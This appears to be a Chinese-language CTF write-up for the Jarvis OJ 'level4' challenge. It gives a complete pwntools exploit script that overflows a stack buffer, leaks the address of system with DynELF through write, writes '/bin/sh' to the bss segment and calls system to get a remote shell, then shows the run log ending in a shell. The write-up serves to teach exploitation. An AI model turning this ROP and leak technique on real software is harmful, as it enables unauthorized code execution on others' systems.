程序开启了NX保护,漏洞很好找
无libc,无system,无"/bin/sh"
有readwrite函数
借用pwntools自带的模块DynELF进行泄露
1.利用write函数泄露system地址
2.利用read函数将"/bin/sh"字符串写到bss段中
3.调用system("/bin/sh")
exp如下:
#!usr/bin/python
from pwn import *
from LibcSearcher import *
io = remote("pwn2.jarvisoj.com", "9880")
# io = process('./level4')
elf = ELF('level4')
read_plt = elf.plt['read']
write_plt = elf.plt['write']
# start_addr = elf.symbols['start']
start_addr = 0x08048350
bss_addr = 0x0804A024
def leak(addr):
payload = 'a' * 0x88 + 'a' * 4 + p32(write_plt) + p32(start_addr) + p32(1) + p32(addr) + p32(4)
io.sendline(payload)
leak_addr = io.recv(4)
return leak_addr
d = DynELF(leak, elf = ELF('level4'))
sys_addr = d.lookup('system','libc')
payload2 = 'a' * 0x88 + 'a' * 4 + p32(read_plt) + p32(start_addr) + p32(0) + p32(bss_addr) + p32(8)
io.sendline(payload2)
io.send("/bin/sh\x00")
payload3 = 'a' * 0x88 + 'a' * 4 + p32(sys_addr) + p32(0xaaaa) + p32(bss_addr)
io.sendline(payload3)
io.interactive()
kk@ubuntu:~/Desktop/black/Jarvis Oj/level4$ python exp.py
[+] Opening connection to pwn2.jarvisoj.com on port 9880: Done
[*] '/home/kk/Desktop/black/Jarvis Oj/level4/level4'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Loading from '/home/kk/Desktop/black/Jarvis Oj/level4/level4': 0xf7771930
[+] Resolving 'system' in 'libc.so': 0xf7771930
[!] No ELF provided. Leaking is much faster if you have a copy of the ELF being leaked.
[*] Trying lookup based on Build ID: de799a85b2ebc2929eb4585f009d0c5e6211f2f8
[-] Downloading 'https://gitlab.com/libcdb/libcdb/raw/master/hashes/build_id/de799a85b2ebc2929eb4585f009d0c5e6211f2f8': Got code 404
[!] Could not fetch libc for build_id de799a85b2ebc2929eb4585f009d0c5e6211f2f8
[*] .gnu.hash/.hash, .strtab and .symtab offsets
[*] Found DT_GNU_HASH at 0xf7742dd8
[*] Found DT_STRTAB at 0xf7742de0
[*] Found DT_SYMTAB at 0xf7742de8
[*] .gnu.hash parms
[*] hash chain index
[*] hash chain
[*] Switching to interactive mode
$ ls
flag
level4
网友评论